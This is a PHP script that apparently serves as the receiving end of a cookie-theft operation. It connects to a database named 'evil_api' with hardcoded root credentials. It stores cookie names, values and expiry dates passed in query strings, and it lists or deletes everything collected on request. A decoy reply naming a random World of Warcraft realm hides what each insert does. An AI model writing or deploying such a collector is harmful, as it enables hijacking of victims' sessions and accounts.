<?php

$realms = array(
'Aegwynn',
'Aerie Peak',
'Agamaggan',
'Aggra (Português)',
'Aggramar',
'Ahn\'Qiraj',
'Al\'Akir',
'Alexstrasza',
'Alleria',
'Alonsus',
'Aman\'Thul',
'Ambossar',
'Anachronos',
'Anetheron',
'Antonidas',
'Anub\'arak',
'Arak-arahm',
'Arathi',
'Arathor',
'Archimonde',
'Area 52',
'Argent Dawn',
'Arthas',
'Arygos',
'Ashenvale',
'Aszune',
'Auchindoun',
'Azjol-Nerub',
'Azshara',
'Azuregos',
'Azuremyst',
'Baelgun',
'Balnazzar',
'Blackhand',
'Blackmoore',
'Blackrock',
'Blackscar',
'Blade\'s Edge',
'Bladefist',
'Bloodfeather',
'Bloodhoof',
'Bloodscalp',
'Blutkessel',
'Booty Bay',
'Borean Tundra',
'Boulderfist',
'Bronze Dragonflight',
'Bronzebeard',
'Burning Blade',
'Burning Legion',
'Burning Steppes',
'C\'Thun',
'Chamber of Aspects',
'Chants éternels',
'Cho\'gall',
'Chromaggus',
'Colinas Pardas',
'Confrérie du Thorium',
'Conseil des Ombres',
'Crushridge',
'Culte de la Rive noire',
'Daggerspine',
'Dalaran',
'Dalvengyr',
'Darkmoon Faire',
'Darksorrow',
'Darkspear',
'Das Konsortium',
'Das Syndikat',
'Deathguard',
'Deathweaver',
'Deathwing',
'Deepholm',
'Defias Brotherhood',
'Dentarg',
'Der abyssische Rat',
'Der Mithrilorden',
'Der Rat von Dalaran',
'Destromath',
'Dethecus',
'Die Aldor',
'Die Arguswacht',
'Die ewige Wacht',
'Die Nachtwache',
'Die Silberne Hand',
'Die Todeskrallen',
'Doomhammer',
'Draenor',
'Dragonblight',
'Dragonmaw',
'Drak\'thul',
'Drek\'Thar',
'Dun Modr',
'Dun Morogh',
'Dunemaul',
'Durotan',
'Earthen Ring',
'Echsenkessel',
'Eitrigg',
'Eldre\'Thalas',
'Elune',
'Emerald Dream',
'Emeriss',
'Eonar',
'Eredar',
'Eversong',
'Executus',
'Exodar',
'Festung der Stürme',
'Fordragon',
'Forscherliga',
'Frostmane',
'Frostmourne',
'Frostwhisper',
'Frostwolf',
'Galakrond',
'Garona',
'Garrosh',
'Genjuros',
'Ghostlands',
'Gilneas',
'Goldrinn',
'Gordunni',
'Gorgonnash',
'Greymane',
'Grim Batol',
'Grom',
'Gul\'dan',
'Hakkar',
'Haomarush',
'Hellfire',
'Hellscream',
'Howling Fjord',
'Hyjal',
'Illidan',
'Jaedenar',
'Kael\'thas',
'Karazhan',
'Kargath',
'Kazzak',
'Kel\'Thuzad',
'Khadgar',
'Khaz Modan',
'Khaz\'goroth',
'Kil\'jaeden',
'Kilrogg',
'Kirin Tor',
'Kor\'gall',
'Krag\'jin',
'Krasus',
'Kul Tiras',
'Kult der Verdammten',
'La Croisade écarlate',
'Laughing Skull',
'Les Clairvoyants',
'Les Sentinelles',
'Lich King',
'Lightbringer',
'Lightning\'s Blade',
'Lordaeron',
'Los Errantes',
'Lothar',
'Madmortem',
'Magtheridon',
'Mal\'Ganis',
'Malfurion',
'Malorne',
'Malygos',
'Mannoroth',
'Marécage de Zangar',
'Mazrigos',
'Medivh',
'Minahonda',
'Moonglade',
'Mug\'thol',
'Nagrand',
'Nathrezim',
'Naxxramas',
'Nazjatar',
'Nefarian',
'Nemesis',
'Neptulon',
'Ner\'zhul',
'Nera\'thor',
'Nethersturm',
'Nordrassil',
'Norgannon',
'Nozdormu',
'Onyxia',
'Outland',
'Perenolde',
'Pozzo dell\'Eternità',
'Proudmoore',
'Quel\'Thalas',
'Ragnaros',
'Rajaxx',
'Rashgarroth',
'Ravencrest',
'Ravenholdt',
'Razuvious',
'Rexxar',
'Runetotem',
'Sanguino',
'Sargeras',
'Saurfang',
'Scarshield Legion',
'Sen\'jin',
'Shadowsong',
'Shattered Halls',
'Shattered Hand',
'Shattrath',
'Shen\'dralar',
'Silvermoon',
'Sinstralis',
'Skullcrusher',
'Soulflayer',
'Spinebreaker',
'Sporeggar',
'Steamwheedle Cartel',
'Stormrage',
'Stormreaver',
'Stormscale',
'Sunstrider',
'Sylvanas',
'Taerar',
'Talnivarr',
'Tarren Mill',
'Teldrassil',
'Temple noir',
'Terenas',
'Terokkar',
'Terrordar',
'The Maelstrom',
'The Sha\'tar',
'The Venture Co',
'Theradras',
'Thermaplugg',
'Thrall',
'Throk\'Feroth',
'Thunderhorn',
'Tichondrius',
'Tirion',
'Todeswache',
'Trollbane',
'Turalyon',
'Twilight\'s Hammer',
'Twisting Nether',
'Tyrande',
'Uldaman',
'Ulduar',
'Uldum',
'Un\'Goro',
'Varimathras',
'Vashj',
'Vek\'lor',
'Vek\'nilash',
'Vol\'jin',
'Wildhammer',
'Wrathbringer',
'Xavius',
'Ysera',
'Ysondre',
'Zenedar',
'Zirkel des Cenarius',
'Zul\'jin',
'Zuluhed');


try {
    $db = array('host' => 'localhost', 'name' => 'evil_api', 'user'=>'root', 'password' => '123');

    $con = new \PDO('mysql:host=' . $db['host'] . '; dbname=' . $db['name'], $db['user'], $db['password']);

    $con->setAttribute(\PDO::ATTR_ERRMODE, \PDO::ERRMODE_EXCEPTION);
    $con->exec("SET CHARACTER SET utf8");
    $pdo = $con;
}
catch(PDOException $err) {
    echo "THE CONNECTION HAS FAILED : ";
    $err->getMessage() . "<br/>";
    file_put_contents('PDOErrors.txt', $err, FILE_APPEND);
    die();
}

if (isset($_GET['insert'])) {

    $stmt = $pdo->prepare("INSERT INTO cookies (name, value, expires) VALUES ( :name , :value , :expires )");

    $stmt->execute(array(
        'name' => $_GET['name'],
        'value' => $_GET['value'],
        'expires' => $_GET['expires'],
    ));

    echo 'Checking for realm : '.$realms[array_rand($realms)];
}

if (isset($_GET['index'])) {

    $stmt = $pdo->prepare("SELECT * FROM cookies");

    $stmt->execute();

    $data = array();
    while ($row = $stmt->fetch(\PDO::FETCH_ASSOC)) {
        $data[] = $row;
    }



    echo '<pre>';
    print_r($data);
    echo '</pre>';
}


if (isset($_GET['delete'])) {

    $stmt = $pdo->prepare("DELETE FROM cookies");

    $stmt->execute();

    echo 'deleted';
}

